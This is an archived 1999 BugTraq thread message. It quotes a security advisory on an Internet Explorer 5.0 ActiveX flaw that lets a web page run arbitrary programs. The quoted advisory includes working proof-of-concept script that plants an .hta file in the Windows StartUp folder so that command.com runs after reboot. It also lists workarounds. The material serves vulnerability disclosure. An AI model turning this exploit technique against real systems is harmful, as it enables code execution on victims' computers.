Re: IE 5.0 allows executing programs

From: Micheal Patterson (dredsterat_private)
Date: Sun Aug 22 1999 - 23:02:54 PDT

Next message: Philip Stoev: "Re: Winamp SHOUTcast server: Gain Administrator Password"

Previous message: Linux Users Strike Today: "Re: ftp.exe overflow..."
Maybe in reply to: Georgi Guninski: "IE 5.0 allows executing programs"
Next in thread: STEVENS, Eric: "Re: IE 5.0 allows executing programs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This apparently works on NT 4.0 sp5 and IE 5.00.2014.0216IC as well..

Micheal Patterson
pattersonmat_private


----- Original Message -----
From: Georgi Guninski <joroat_private>
To: <BUGTRAQat_private>
Sent: Saturday, August 21, 1999 11:17 AM
Subject: IE 5.0 allows executing programs


> Disclaimer:
> The opinions expressed in this advisory and program are my own and not
> of any company.
> The usual standard disclaimer applies, especially the fact that Georgi
> Guninski
> is not liable for any damages caused by direct or  indirect use of the
> information or functionality provided by this program.
> Georgi Guninski, bears NO responsibility for content or misuse of this
> program or any derivatives thereof.
>
> Description:
>
> Internet Explorer 5.0 under Windows 95/98 (do not know about NT)
> allows executing arbitrary programs on the local machine by creating and
> overwriting local files and putting content in them.
>
> Details:
>
> The problem is the ActiveX Control "Object for constructing type
> libraries for scriptlets".
> It allows creating and overwriting local files, and more putting content
> in them.
> There is some unneeded information in the file, but part of the content
> may be chosen.
> So, an HTML Application file may be created, feeded with an exploit
> information and written to the StartUp folder.
> The next time the user reboots (which may be forced), the code in the
> HTML Application file will be executed.
> This vulnerability can be exploited via email.
>
> Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html
>
> Workaround:
> Disable Active Scripting
> or
> Disable Run ActiveX Controls and plug-ins
>
> The code is:
>
> <object id="scr"
>    classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
> >
> </object>
> <SCRIPT>
> scr.Reset();
> scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
> scr.Doc="<object id='wsh'
>
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Written
> by Georgi Guninski
> http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
> scr.write();
> </SCRIPT>
> </object>
>
> Regards,
> Georgi Guninski
> http://www.nat.bg/~joro
>

Next message: Philip Stoev: "Re: Winamp SHOUTcast server: Gain Administrator Password"
Previous message: Linux Users Strike Today: "Re: ftp.exe overflow..."
Maybe in reply to: Georgi Guninski: "IE 5.0 allows executing programs"
Next in thread: STEVENS, Eric: "Re: IE 5.0 allows executing programs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:59 PDT